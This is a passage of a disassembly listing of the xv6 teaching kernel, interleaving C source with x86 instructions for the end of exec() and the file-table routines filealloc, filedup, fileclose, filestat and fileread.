= setupkvm()) == 0) 80100a74: e8 77 64 00 00 call 80106ef0 <setupkvm> 80100a79: 85 c0 test %eax,%eax 80100a7b: 89 85 f0 fe ff ff mov %eax,-0x110(%ebp) 80100a81: 74 c3 je 80100a46 <exec+0x56> goto bad; // Load program into memory. sz = 0; for(i=0, off=elf.phoff; i<elf.phnum; i++, off+=sizeof(ph)){ 80100a83: 66 83 bd 50 ff ff ff cmpw $0x0,-0xb0(%ebp) 80100a8a: 00 80100a8b: 8b b5 40 ff ff ff mov -0xc0(%ebp),%esi 80100a91: c7 85 ec fe ff ff 00 movl $0x0,-0x114(%ebp) 80100a98: 00 00 00 80100a9b: 0f 84 c5 00 00 00 je 80100b66 <exec+0x176> 80100aa1: 31 ff xor %edi,%edi 80100aa3: eb 18 jmp 80100abd <exec+0xcd> 80100aa5: 8d 76 00 lea 0x0(%esi),%esi 80100aa8: 0f b7 85 50 ff ff ff movzwl -0xb0(%ebp),%eax 80100aaf: 83 c7 01 add $0x1,%edi 80100ab2: 83 c6 20 add $0x20,%esi 80100ab5: 39 f8 cmp %edi,%eax 80100ab7: 0f 8e a9 00 00 00 jle 80100b66 <exec+0x176> if(readi(ip, (char*)&ph, off, sizeof(ph)) != sizeof(ph)) 80100abd: 8d 85 04 ff ff ff lea -0xfc(%ebp),%eax 80100ac3: 6a 20 push $0x20 80100ac5: 56 push %esi 80100ac6: 50 push %eax 80100ac7: 53 push %ebx 80100ac8: e8 83 0e 00 00 call 80101950 <readi> 80100acd: 83 c4 10 add $0x10,%esp 80100ad0: 83 f8 20 cmp $0x20,%eax 80100ad3: 75 7b jne 80100b50 <exec+0x160> goto bad; if(ph.type != ELF_PROG_LOAD) 80100ad5: 83 bd 04 ff ff ff 01 cmpl $0x1,-0xfc(%ebp) 80100adc: 75 ca jne 80100aa8 <exec+0xb8> continue; if(ph.memsz < ph.filesz) 80100ade: 8b 85 18 ff ff ff mov -0xe8(%ebp),%eax 80100ae4: 3b 85 14 ff ff ff cmp -0xec(%ebp),%eax 80100aea: 72 64 jb 80100b50 <exec+0x160> goto bad; if(ph.vaddr + ph.memsz < ph.vaddr) 80100aec: 03 85 0c ff ff ff add -0xf4(%ebp),%eax 80100af2: 72 5c jb 80100b50 <exec+0x160> goto bad; if((sz = allocuvm(pgdir, sz, ph.vaddr + ph.memsz)) == 0) 80100af4: 83 ec 04 sub $0x4,%esp 80100af7: 50 push %eax 80100af8: ff b5 ec fe ff ff pushl -0x114(%ebp) 80100afe: ff b5 f0 fe ff ff pushl -0x110(%ebp) 80100b04: e8 37 62 00 00 call 80106d40 <allocuvm> 80100b09: 83 c4 10 add $0x10,%esp 80100b0c: 85 c0 test %eax,%eax 80100b0e: 89 85 ec fe ff ff mov %eax,-0x114(%ebp) 80100b14: 74 3a je 80100b50 <exec+0x160> goto bad; if(ph.vaddr % PGSIZE != 0) 80100b16: 8b 85 0c ff ff ff mov -0xf4(%ebp),%eax 80100b1c: a9 ff 0f 00 00 test $0xfff,%eax 80100b21: 75 2d jne 80100b50 <exec+0x160> goto bad; if(loaduvm(pgdir, (char*)ph.vaddr, ip, ph.off, ph.filesz) < 0) 80100b23: 83 ec 0c sub $0xc,%esp 80100b26: ff b5 14 ff ff ff pushl -0xec(%ebp) 80100b2c: ff b5 08 ff ff ff pushl -0xf8(%ebp) 80100b32: 53 push %ebx 80100b33: 50 push %eax 80100b34: ff b5 f0 fe ff ff pushl -0x110(%ebp) 80100b3a: e8 f1 60 00 00 call 80106c30 <loaduvm> 80100b3f: 83 c4 20 add $0x20,%esp 80100b42: 85 c0 test %eax,%eax 80100b44: 0f 89 5e ff ff ff jns 80100aa8 <exec+0xb8> 80100b4a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi freevm(oldpgdir); return 0; bad: if(pgdir) freevm(pgdir); 80100b50: 83 ec 0c sub $0xc,%esp 80100b53: ff b5 f0 fe ff ff pushl -0x110(%ebp) 80100b59: e8 12 63 00 00 call 80106e70 <freevm> 80100b5e: 83 c4 10 add $0x10,%esp 80100b61: e9 e0 fe ff ff jmp 80100a46 <exec+0x56> if(ph.vaddr % PGSIZE != 0) goto bad; if(loaduvm(pgdir, (char*)ph.vaddr, ip, ph.off, ph.filesz) < 0) goto bad; } iunlockput(ip); 80100b66: 83 ec 0c sub $0xc,%esp 80100b69: 53 push %ebx 80100b6a: e8 91 0d 00 00 call 80101900 <iunlockput> end_op(); 80100b6f: e8 4c 20 00 00 call 80102bc0 <end_op> ip = 0; // Allocate two pages at the next page boundary. // Make the first inaccessible. Use the second as the user stack. sz = PGROUNDUP(sz); 80100b74: 8b 85 ec fe ff ff mov -0x114(%ebp),%eax if((sz = allocuvm(pgdir, sz, sz + 2*PGSIZE)) == 0) 80100b7a: 83 c4 0c add $0xc,%esp end_op(); ip = 0; // Allocate two pages at the next page boundary. // Make the first inaccessible. Use the second as the user stack. sz = PGROUNDUP(sz); 80100b7d: 05 ff 0f 00 00 add $0xfff,%eax 80100b82: 25 00 f0 ff ff and $0xfffff000,%eax if((sz = allocuvm(pgdir, sz, sz + 2*PGSIZE)) == 0) 80100b87: 8d 90 00 20 00 00 lea 0x2000(%eax),%edx 80100b8d: 52 push %edx 80100b8e: 50 push %eax 80100b8f: ff b5 f0 fe ff ff pushl -0x110(%ebp) 80100b95: e8 a6 61 00 00 call 80106d40 <allocuvm> 80100b9a: 83 c4 10 add $0x10,%esp 80100b9d: 85 c0 test %eax,%eax 80100b9f: 89 c6 mov %eax,%esi 80100ba1: 75 3a jne 80100bdd <exec+0x1ed> freevm(oldpgdir); return 0; bad: if(pgdir) freevm(pgdir); 80100ba3: 83 ec 0c sub $0xc,%esp 80100ba6: ff b5 f0 fe ff ff pushl -0x110(%ebp) 80100bac: e8 bf 62 00 00 call 80106e70 <freevm> 80100bb1: 83 c4 10 add $0x10,%esp if(ip){ iunlockput(ip); end_op(); } return -1; 80100bb4: b8 ff ff ff ff mov $0xffffffff,%eax 80100bb9: e9 9e fe ff ff jmp 80100a5c <exec+0x6c> struct proc *curproc = myproc(); begin_op(); if((ip = namei(path)) == 0){ end_op(); 80100bbe: e8 fd 1f 00 00 call 80102bc0 <end_op> cprintf("exec: fail\n"); 80100bc3: 83 ec 0c sub $0xc,%esp 80100bc6: 68 21 72 10 80 push $0x80107221 80100bcb: e8 90 fa ff ff call 80100660 <cprintf> return -1; 80100bd0: 83 c4 10 add $0x10,%esp 80100bd3: b8 ff ff ff ff mov $0xffffffff,%eax 80100bd8: e9 7f fe ff ff jmp 80100a5c <exec+0x6c> // Allocate two pages at the next page boundary. // Make the first inaccessible. Use the second as the user stack. sz = PGROUNDUP(sz); if((sz = allocuvm(pgdir, sz, sz + 2*PGSIZE)) == 0) goto bad; clearpteu(pgdir, (char*)(sz - 2*PGSIZE)); 80100bdd: 8d 80 00 e0 ff ff lea -0x2000(%eax),%eax 80100be3: 83 ec 08 sub $0x8,%esp sp = sz; // Push argument strings, prepare rest of stack in ustack. for(argc = 0; argv[argc]; argc++) { 80100be6: 31 ff xor %edi,%edi 80100be8: 89 f3 mov %esi,%ebx // Allocate two pages at the next page boundary. // Make the first inaccessible. Use the second as the user stack. sz = PGROUNDUP(sz); if((sz = allocuvm(pgdir, sz, sz + 2*PGSIZE)) == 0) goto bad; clearpteu(pgdir, (char*)(sz - 2*PGSIZE)); 80100bea: 50 push %eax 80100beb: ff b5 f0 fe ff ff pushl -0x110(%ebp) 80100bf1: e8 9a 63 00 00 call 80106f90 <clearpteu> sp = sz; // Push argument strings, prepare rest of stack in ustack. for(argc = 0; argv[argc]; argc++) { 80100bf6: 8b 45 0c mov 0xc(%ebp),%eax 80100bf9: 83 c4 10 add $0x10,%esp 80100bfc: 8d 95 58 ff ff ff lea -0xa8(%ebp),%edx 80100c02: 8b 00 mov (%eax),%eax 80100c04: 85 c0 test %eax,%eax 80100c06: 74 79 je 80100c81 <exec+0x291> 80100c08: 89 b5 ec fe ff ff mov %esi,-0x114(%ebp) 80100c0e: 8b b5 f0 fe ff ff mov -0x110(%ebp),%esi 80100c14: eb 13 jmp 80100c29 <exec+0x239> 80100c16: 8d 76 00 lea 0x0(%esi),%esi 80100c19: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi if(argc >= MAXARG) 80100c20: 83 ff 20 cmp $0x20,%edi 80100c23: 0f 84 7a ff ff ff je 80100ba3 <exec+0x1b3> goto bad; sp = (sp - (strlen(argv[argc]) + 1)) & ~3; 80100c29: 83 ec 0c sub $0xc,%esp 80100c2c: 50 push %eax 80100c2d: e8 9e 3c 00 00 call 801048d0 <strlen> 80100c32: f7 d0 not %eax 80100c34: 01 c3 add %eax,%ebx if(copyout(pgdir, sp, argv[argc], strlen(argv[argc]) + 1) < 0) 80100c36: 8b 45 0c mov 0xc(%ebp),%eax 80100c39: 5a pop %edx // Push argument strings, prepare rest of stack in ustack. for(argc = 0; argv[argc]; argc++) { if(argc >= MAXARG) goto bad; sp = (sp - (strlen(argv[argc]) + 1)) & ~3; 80100c3a: 83 e3 fc and $0xfffffffc,%ebx if(copyout(pgdir, sp, argv[argc], strlen(argv[argc]) + 1) < 0) 80100c3d: ff 34 b8 pushl (%eax,%edi,4) 80100c40: e8 8b 3c 00 00 call 801048d0 <strlen> 80100c45: 83 c0 01 add $0x1,%eax 80100c48: 50 push %eax 80100c49: 8b 45 0c mov 0xc(%ebp),%eax 80100c4c: ff 34 b8 pushl (%eax,%edi,4) 80100c4f: 53 push %ebx 80100c50: 56 push %esi 80100c51: e8 9a 64 00 00 call 801070f0 <copyout> 80100c56: 83 c4 20 add $0x20,%esp 80100c59: 85 c0 test %eax,%eax 80100c5b: 0f 88 42 ff ff ff js 80100ba3 <exec+0x1b3> goto bad; clearpteu(pgdir, (char*)(sz - 2*PGSIZE)); sp = sz; // Push argument strings, prepare rest of stack in ustack. for(argc = 0; argv[argc]; argc++) { 80100c61: 8b 45 0c mov 0xc(%ebp),%eax if(argc >= MAXARG) goto bad; sp = (sp - (strlen(argv[argc]) + 1)) & ~3; if(copyout(pgdir, sp, argv[argc], strlen(argv[argc]) + 1) < 0) goto bad; ustack[3+argc] = sp; 80100c64: 89 9c bd 64 ff ff ff mov %ebx,-0x9c(%ebp,%edi,4) goto bad; clearpteu(pgdir, (char*)(sz - 2*PGSIZE)); sp = sz; // Push argument strings, prepare rest of stack in ustack. for(argc = 0; argv[argc]; argc++) { 80100c6b: 83 c7 01 add $0x1,%edi if(argc >= MAXARG) goto bad; sp = (sp - (strlen(argv[argc]) + 1)) & ~3; if(copyout(pgdir, sp, argv[argc], strlen(argv[argc]) + 1) < 0) goto bad; ustack[3+argc] = sp; 80100c6e: 8d 95 58 ff ff ff lea -0xa8(%ebp),%edx goto bad; clearpteu(pgdir, (char*)(sz - 2*PGSIZE)); sp = sz; // Push argument strings, prepare rest of stack in ustack. for(argc = 0; argv[argc]; argc++) { 80100c74: 8b 04 b8 mov (%eax,%edi,4),%eax 80100c77: 85 c0 test %eax,%eax 80100c79: 75 a5 jne 80100c20 <exec+0x230> 80100c7b: 8b b5 ec fe ff ff mov -0x114(%ebp),%esi } ustack[3+argc] = 0; ustack[0] = 0xffffffff; // fake return PC ustack[1] = argc; ustack[2] = sp - (argc+1)*4; // argv pointer 80100c81: 8d 04 bd 04 00 00 00 lea 0x4(,%edi,4),%eax 80100c88: 89 d9 mov %ebx,%ecx sp = (sp - (strlen(argv[argc]) + 1)) & ~3; if(copyout(pgdir, sp, argv[argc], strlen(argv[argc]) + 1) < 0) goto bad; ustack[3+argc] = sp; } ustack[3+argc] = 0; 80100c8a: c7 84 bd 64 ff ff ff movl $0x0,-0x9c(%ebp,%edi,4) 80100c91: 00 00 00 00 ustack[0] = 0xffffffff; // fake return PC 80100c95: c7 85 58 ff ff ff ff movl $0xffffffff,-0xa8(%ebp) 80100c9c: ff ff ff ustack[1] = argc; 80100c9f: 89 bd 5c ff ff ff mov %edi,-0xa4(%ebp) ustack[2] = sp - (argc+1)*4; // argv pointer 80100ca5: 29 c1 sub %eax,%ecx sp -= (3+argc+1) * 4; 80100ca7: 83 c0 0c add $0xc,%eax 80100caa: 29 c3 sub %eax,%ebx if(copyout(pgdir, sp, ustack, (3+argc+1)*4) < 0) 80100cac: 50 push %eax 80100cad: 52 push %edx 80100cae: 53 push %ebx 80100caf: ff b5 f0 fe ff ff pushl -0x110(%ebp) } ustack[3+argc] = 0; ustack[0] = 0xffffffff; // fake return PC ustack[1] = argc; ustack[2] = sp - (argc+1)*4; // argv pointer 80100cb5: 89 8d 60 ff ff ff mov %ecx,-0xa0(%ebp) sp -= (3+argc+1) * 4; if(copyout(pgdir, sp, ustack, (3+argc+1)*4) < 0) 80100cbb: e8 30 64 00 00 call 801070f0 <copyout> 80100cc0: 83 c4 10 add $0x10,%esp 80100cc3: 85 c0 test %eax,%eax 80100cc5: 0f 88 d8 fe ff ff js 80100ba3 <exec+0x1b3> goto bad; // Save program name for debugging. for(last=s=path; *s; s++) 80100ccb: 8b 45 08 mov 0x8(%ebp),%eax 80100cce: 0f b6 10 movzbl (%eax),%edx 80100cd1: 84 d2 test %dl,%dl 80100cd3: 74 19 je 80100cee <exec+0x2fe> 80100cd5: 8b 4d 08 mov 0x8(%ebp),%ecx 80100cd8: 83 c0 01 add $0x1,%eax if(*s == '/') last = s+1; 80100cdb: 80 fa 2f cmp $0x2f,%dl sp -= (3+argc+1) * 4; if(copyout(pgdir, sp, ustack, (3+argc+1)*4) < 0) goto bad; // Save program name for debugging. for(last=s=path; *s; s++) 80100cde: 0f b6 10 movzbl (%eax),%edx if(*s == '/') last = s+1; 80100ce1: 0f 44 c8 cmove %eax,%ecx 80100ce4: 83 c0 01 add $0x1,%eax sp -= (3+argc+1) * 4; if(copyout(pgdir, sp, ustack, (3+argc+1)*4) < 0) goto bad; // Save program name for debugging. for(last=s=path; *s; s++) 80100ce7: 84 d2 test %dl,%dl 80100ce9: 75 f0 jne 80100cdb <exec+0x2eb> 80100ceb: 89 4d 08 mov %ecx,0x8(%ebp) if(*s == '/') last = s+1; safestrcpy(curproc->name, last, sizeof(curproc->name)); 80100cee: 8b bd f4 fe ff ff mov -0x10c(%ebp),%edi 80100cf4: 50 push %eax 80100cf5: 6a 10 push $0x10 80100cf7: ff 75 08 pushl 0x8(%ebp) 80100cfa: 89 f8 mov %edi,%eax 80100cfc: 83 c0 6c add $0x6c,%eax 80100cff: 50 push %eax 80100d00: e8 8b 3b 00 00 call 80104890 <safestrcpy> // Commit to the user image. oldpgdir = curproc->pgdir; curproc->pgdir = pgdir; 80100d05: 8b 8d f0 fe ff ff mov -0x110(%ebp),%ecx if(*s == '/') last = s+1; safestrcpy(curproc->name, last, sizeof(curproc->name)); // Commit to the user image. oldpgdir = curproc->pgdir; 80100d0b: 89 f8 mov %edi,%eax 80100d0d: 8b 7f 04 mov 0x4(%edi),%edi curproc->pgdir = pgdir; curproc->sz = sz; 80100d10: 89 30 mov %esi,(%eax) last = s+1; safestrcpy(curproc->name, last, sizeof(curproc->name)); // Commit to the user image. oldpgdir = curproc->pgdir; curproc->pgdir = pgdir; 80100d12: 89 48 04 mov %ecx,0x4(%eax) curproc->sz = sz; curproc->tf->eip = elf.entry; // main 80100d15: 89 c1 mov %eax,%ecx 80100d17: 8b 95 3c ff ff ff mov -0xc4(%ebp),%edx 80100d1d: 8b 40 18 mov 0x18(%eax),%eax 80100d20: 89 50 38 mov %edx,0x38(%eax) curproc->tf->esp = sp; 80100d23: 8b 41 18 mov 0x18(%ecx),%eax 80100d26: 89 58 44 mov %ebx,0x44(%eax) switchuvm(curproc); 80100d29: 89 0c 24 mov %ecx,(%esp) 80100d2c: e8 6f 5d 00 00 call 80106aa0 <switchuvm> freevm(oldpgdir); 80100d31: 89 3c 24 mov %edi,(%esp) 80100d34: e8 37 61 00 00 call 80106e70 <freevm> return 0; 80100d39: 83 c4 10 add $0x10,%esp 80100d3c: 31 c0 xor %eax,%eax 80100d3e: e9 19 fd ff ff jmp 80100a5c <exec+0x6c> 80100d43: 66 90 xchg %ax,%ax 80100d45: 66 90 xchg %ax,%ax 80100d47: 66 90 xchg %ax,%ax 80100d49: 66 90 xchg %ax,%ax 80100d4b: 66 90 xchg %ax,%ax 80100d4d: 66 90 xchg %ax,%ax 80100d4f: 90 nop 80100d50 <fileinit>: struct file file[NFILE]; } ftable; void fileinit(void) { 80100d50: 55 push %ebp 80100d51: 89 e5 mov %esp,%ebp 80100d53: 83 ec 10 sub $0x10,%esp initlock(&ftable.lock, "ftable"); 80100d56: 68 2d 72 10 80 push $0x8010722d 80100d5b: 68 e0 ff 10 80 push $0x8010ffe0 80100d60: e8 bb 36 00 00 call 80104420 <initlock> } 80100d65: 83 c4 10 add $0x10,%esp 80100d68: c9 leave 80100d69: c3 ret 80100d6a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 80100d70 <filealloc>: // Allocate a file structure. struct file* filealloc(void) { 80100d70: 55 push %ebp 80100d71: 89 e5 mov %esp,%ebp 80100d73: 53 push %ebx struct file *f; acquire(&ftable.lock); for(f = ftable.file; f < ftable.file + NFILE; f++){ 80100d74: bb 14 00 11 80 mov $0x80110014,%ebx } // Allocate a file structure. struct file* filealloc(void) { 80100d79: 83 ec 10 sub $0x10,%esp struct file *f; acquire(&ftable.lock); 80100d7c: 68 e0 ff 10 80 push $0x8010ffe0 80100d81: e8 9a 37 00 00 call 80104520 <acquire> 80100d86: 83 c4 10 add $0x10,%esp 80100d89: eb 10 jmp 80100d9b <filealloc+0x2b> 80100d8b: 90 nop 80100d8c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi for(f = ftable.file; f < ftable.file + NFILE; f++){ 80100d90: 83 c3 18 add $0x18,%ebx 80100d93: 81 fb 74 09 11 80 cmp $0x80110974,%ebx 80100d99: 74 25 je 80100dc0 <filealloc+0x50> if(f->ref == 0){ 80100d9b: 8b 43 04 mov 0x4(%ebx),%eax 80100d9e: 85 c0 test %eax,%eax 80100da0: 75 ee jne 80100d90 <filealloc+0x20> f->ref = 1; release(&ftable.lock); 80100da2: 83 ec 0c sub $0xc,%esp struct file *f; acquire(&ftable.lock); for(f = ftable.file; f < ftable.file + NFILE; f++){ if(f->ref == 0){ f->ref = 1; 80100da5: c7 43 04 01 00 00 00 movl $0x1,0x4(%ebx) release(&ftable.lock); 80100dac: 68 e0 ff 10 80 push $0x8010ffe0 80100db1: e8 8a 38 00 00 call 80104640 <release> return f; 80100db6: 89 d8 mov %ebx,%eax 80100db8: 83 c4 10 add $0x10,%esp } } release(&ftable.lock); return 0; } 80100dbb: 8b 5d fc mov -0x4(%ebp),%ebx 80100dbe: c9 leave 80100dbf: c3 ret f->ref = 1; release(&ftable.lock); return f; } } release(&ftable.lock); 80100dc0: 83 ec 0c sub $0xc,%esp 80100dc3: 68 e0 ff 10 80 push $0x8010ffe0 80100dc8: e8 73 38 00 00 call 80104640 <release> return 0; 80100dcd: 83 c4 10 add $0x10,%esp 80100dd0: 31 c0 xor %eax,%eax } 80100dd2: 8b 5d fc mov -0x4(%ebp),%ebx 80100dd5: c9 leave 80100dd6: c3 ret 80100dd7: 89 f6 mov %esi,%esi 80100dd9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80100de0 <filedup>: // Increment ref count for file f. struct file* filedup(struct file *f) { 80100de0: 55 push %ebp 80100de1: 89 e5 mov %esp,%ebp 80100de3: 53 push %ebx 80100de4: 83 ec 10 sub $0x10,%esp 80100de7: 8b 5d 08 mov 0x8(%ebp),%ebx acquire(&ftable.lock); 80100dea: 68 e0 ff 10 80 push $0x8010ffe0 80100def: e8 2c 37 00 00 call 80104520 <acquire> if(f->ref < 1) 80100df4: 8b 43 04 mov 0x4(%ebx),%eax 80100df7: 83 c4 10 add $0x10,%esp 80100dfa: 85 c0 test %eax,%eax 80100dfc: 7e 1a jle 80100e18 <filedup+0x38> panic("filedup"); f->ref++; 80100dfe: 83 c0 01 add $0x1,%eax release(&ftable.lock); 80100e01: 83 ec 0c sub $0xc,%esp filedup(struct file *f) { acquire(&ftable.lock); if(f->ref < 1) panic("filedup"); f->ref++; 80100e04: 89 43 04 mov %eax,0x4(%ebx) release(&ftable.lock); 80100e07: 68 e0 ff 10 80 push $0x8010ffe0 80100e0c: e8 2f 38 00 00 call 80104640 <release> return f; } 80100e11: 89 d8 mov %ebx,%eax 80100e13: 8b 5d fc mov -0x4(%ebp),%ebx 80100e16: c9 leave 80100e17: c3 ret struct file* filedup(struct file *f) { acquire(&ftable.lock); if(f->ref < 1) panic("filedup"); 80100e18: 83 ec 0c sub $0xc,%esp 80100e1b: 68 34 72 10 80 push $0x80107234 80100e20: e8 4b f5 ff ff call 80100370 <panic> 80100e25: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80100e29: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80100e30 <fileclose>: } // Close file f. (Decrement ref count, close when reaches 0.) void fileclose(struct file *f) { 80100e30: 55 push %ebp 80100e31: 89 e5 mov %esp,%ebp 80100e33: 57 push %edi 80100e34: 56 push %esi 80100e35: 53 push %ebx 80100e36: 83 ec 28 sub $0x28,%esp 80100e39: 8b 7d 08 mov 0x8(%ebp),%edi struct file ff; acquire(&ftable.lock); 80100e3c: 68 e0 ff 10 80 push $0x8010ffe0 80100e41: e8 da 36 00 00 call 80104520 <acquire> if(f->ref < 1) 80100e46: 8b 47 04 mov 0x4(%edi),%eax 80100e49: 83 c4 10 add $0x10,%esp 80100e4c: 85 c0 test %eax,%eax 80100e4e: 0f 8e 9b 00 00 00 jle 80100eef <fileclose+0xbf> panic("fileclose"); if(--f->ref > 0){ 80100e54: 83 e8 01 sub $0x1,%eax 80100e57: 85 c0 test %eax,%eax 80100e59: 89 47 04 mov %eax,0x4(%edi) 80100e5c: 74 1a je 80100e78 <fileclose+0x48> release(&ftable.lock); 80100e5e: c7 45 08 e0 ff 10 80 movl $0x8010ffe0,0x8(%ebp) else if(ff.type == FD_INODE){ begin_op(); iput(ff.ip); end_op(); } } 80100e65: 8d 65 f4 lea -0xc(%ebp),%esp 80100e68: 5b pop %ebx 80100e69: 5e pop %esi 80100e6a: 5f pop %edi 80100e6b: 5d pop %ebp acquire(&ftable.lock); if(f->ref < 1) panic("fileclose"); if(--f->ref > 0){ release(&ftable.lock); 80100e6c: e9 cf 37 00 00 jmp 80104640 <release> 80100e71: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi return; } ff = *f; 80100e78: 0f b6 47 09 movzbl 0x9(%edi),%eax 80100e7c: 8b 1f mov (%edi),%ebx f->ref = 0; f->type = FD_NONE; release(&ftable.lock); 80100e7e: 83 ec 0c sub $0xc,%esp panic("fileclose"); if(--f->ref > 0){ release(&ftable.lock); return; } ff = *f; 80100e81: 8b 77 0c mov 0xc(%edi),%esi f->ref = 0; f->type = FD_NONE; 80100e84: c7 07 00 00 00 00 movl $0x0,(%edi) panic("fileclose"); if(--f->ref > 0){ release(&ftable.lock); return; } ff = *f; 80100e8a: 88 45 e7 mov %al,-0x19(%ebp) 80100e8d: 8b 47 10 mov 0x10(%edi),%eax f->ref = 0; f->type = FD_NONE; release(&ftable.lock); 80100e90: 68 e0 ff 10 80 push $0x8010ffe0 panic("fileclose"); if(--f->ref > 0){ release(&ftable.lock); return; } ff = *f; 80100e95: 89 45 e0 mov %eax,-0x20(%ebp) f->ref = 0; f->type = FD_NONE; release(&ftable.lock); 80100e98: e8 a3 37 00 00 call 80104640 <release> if(ff.type == FD_PIPE) 80100e9d: 83 c4 10 add $0x10,%esp 80100ea0: 83 fb 01 cmp $0x1,%ebx 80100ea3: 74 13 je 80100eb8 <fileclose+0x88> pipeclose(ff.pipe, ff.writable); else if(ff.type == FD_INODE){ 80100ea5: 83 fb 02 cmp $0x2,%ebx 80100ea8: 74 26 je 80100ed0 <fileclose+0xa0> begin_op(); iput(ff.ip); end_op(); } } 80100eaa: 8d 65 f4 lea -0xc(%ebp),%esp 80100ead: 5b pop %ebx 80100eae: 5e pop %esi 80100eaf: 5f pop %edi 80100eb0: 5d pop %ebp 80100eb1: c3 ret 80100eb2: 8d b6 00 00 00 00 lea 0x0(%esi),%esi f->ref = 0; f->type = FD_NONE; release(&ftable.lock); if(ff.type == FD_PIPE) pipeclose(ff.pipe, ff.writable); 80100eb8: 0f be 5d e7 movsbl -0x19(%ebp),%ebx 80100ebc: 83 ec 08 sub $0x8,%esp 80100ebf: 53 push %ebx 80100ec0: 56 push %esi 80100ec1: e8 2a 24 00 00 call 801032f0 <pipeclose> 80100ec6: 83 c4 10 add $0x10,%esp 80100ec9: eb df jmp 80100eaa <fileclose+0x7a> 80100ecb: 90 nop 80100ecc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi else if(ff.type == FD_INODE){ begin_op(); 80100ed0: e8 7b 1c 00 00 call 80102b50 <begin_op> iput(ff.ip); 80100ed5: 83 ec 0c sub $0xc,%esp 80100ed8: ff 75 e0 pushl -0x20(%ebp) 80100edb: e8 c0 08 00 00 call 801017a0 <iput> end_op(); 80100ee0: 83 c4 10 add $0x10,%esp } } 80100ee3: 8d 65 f4 lea -0xc(%ebp),%esp 80100ee6: 5b pop %ebx 80100ee7: 5e pop %esi 80100ee8: 5f pop %edi 80100ee9: 5d pop %ebp if(ff.type == FD_PIPE) pipeclose(ff.pipe, ff.writable); else if(ff.type == FD_INODE){ begin_op(); iput(ff.ip); end_op(); 80100eea: e9 d1 1c 00 00 jmp 80102bc0 <end_op> { struct file ff; acquire(&ftable.lock); if(f->ref < 1) panic("fileclose"); 80100eef: 83 ec 0c sub $0xc,%esp 80100ef2: 68 3c 72 10 80 push $0x8010723c 80100ef7: e8 74 f4 ff ff call 80100370 <panic> 80100efc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80100f00 <filestat>: } // Get metadata about file f. int filestat(struct file *f, struct stat *st) { 80100f00: 55 push %ebp 80100f01: 89 e5 mov %esp,%ebp 80100f03: 53 push %ebx 80100f04: 83 ec 04 sub $0x4,%esp 80100f07: 8b 5d 08 mov 0x8(%ebp),%ebx if(f->type == FD_INODE){ 80100f0a: 83 3b 02 cmpl $0x2,(%ebx) 80100f0d: 75 31 jne 80100f40 <filestat+0x40> ilock(f->ip); 80100f0f: 83 ec 0c sub $0xc,%esp 80100f12: ff 73 10 pushl 0x10(%ebx) 80100f15: e8 56 07 00 00 call 80101670 <ilock> stati(f->ip, st); 80100f1a: 58 pop %eax 80100f1b: 5a pop %edx 80100f1c: ff 75 0c pushl 0xc(%ebp) 80100f1f: ff 73 10 pushl 0x10(%ebx) 80100f22: e8 f9 09 00 00 call 80101920 <stati> iunlock(f->ip); 80100f27: 59 pop %ecx 80100f28: ff 73 10 pushl 0x10(%ebx) 80100f2b: e8 20 08 00 00 call 80101750 <iunlock> return 0; 80100f30: 83 c4 10 add $0x10,%esp 80100f33: 31 c0 xor %eax,%eax } return -1; } 80100f35: 8b 5d fc mov -0x4(%ebp),%ebx 80100f38: c9 leave 80100f39: c3 ret 80100f3a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi ilock(f->ip); stati(f->ip, st); iunlock(f->ip); return 0; } return -1; 80100f40: b8 ff ff ff ff mov $0xffffffff,%eax } 80100f45: 8b 5d fc mov -0x4(%ebp),%ebx 80100f48: c9 leave 80100f49: c3 ret 80100f4a: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 80100f50 <fileread>: // Read from file f. int fileread(struct file *f, char *addr, int n) { 80100f50: 55 push %ebp 80100f51: 89 e5 mov %esp,%ebp 80100f53: 57 push %edi 80100f54: 56 push %esi 80100f55: 53 push %ebx 80100f56: 83 ec 0c sub $0xc,%esp 80100f59: 8b 5d 08 mov 0x8(%ebp),%ebx 80100f5c: 8b 75 0c mov 0xc(%ebp),%esi 80100f5f: 8b 7d 10 mov 0x10(%ebp),%edi int r; if(f->readable == 0) 80100f62: 80 7b 08 00 cmpb $0x0,0x8(%ebx) 80100f66: 74 60 je 80100fc8 <fileread+0x78> return -1; if(f->type == FD_PIPE) 80100f68: 8b 03 mov (%ebx),%eax 80100f6a: 83 f8 01 cmp $0x1,%eax 80100f6d: 74 41 je 80100fb0 <fileread+0x60> return piperead(f->pipe, addr, n); if(f->type == FD_INODE){ 80100f6f: 83 f8 02 cmp $0x2,%eax 80100f72: 75 5b jne 80100fcf <fileread+0x7f> ilock(f->ip); 80100f74: 83 ec 0c sub $0xc,%esp 80100f77: ff 73 10 pushl 0x10(%ebx) 80100f7a: e8 f1 06 00 00 call 80101670 <ilock> if((r = readi(f->ip, addr, f->off, n)) > 0) 80100f7f: 57 push %edi 80100f80: ff 73 14 pushl 0x14(%ebx) 80100f83: 56 push %esi 80100f84: ff 73 10 pushl 0x10(%ebx) 80100f87: e8 c4 09 00 00 call 80101950 <readi> 80100f8c: 83 c4 20 add $0x20,%esp 80100f8f: 85 c0 test %eax,%eax 80100f91: 89 c6 mov %eax,%esi 80100f93: 7e 03 jle 80100f98 <fileread+0x48> f->off += r; 80100f95: 01 43 14 add %eax,0x14(%ebx) iunlock(f->ip); 80100f98: 83 ec 0c sub $0xc,%esp 80100f9b: ff 73 10 pushl 0x10(%ebx) 80100f9e: e8 ad 07 00 00 call 80101750 <iunlock> return r; 80100fa3: 83 c4 10 add $0x10,%esp return -1; if(f->type == FD_PIPE) return piperead(f->pipe, addr, n); if(f->type == FD_INODE){ ilock(f->ip); if((r = readi(f->ip, addr, f->off, n)) > 0) 80100fa6: 89 f0 mov %esi,%eax f->off += r; iunlock(f->ip); return r; } panic("fileread"); } 80100fa8: 8d 65 f4 lea -0xc(%ebp),%esp 80100fab: 5b pop %ebx 80100fac: 5e pop %esi 80100fad: 5f pop %edi 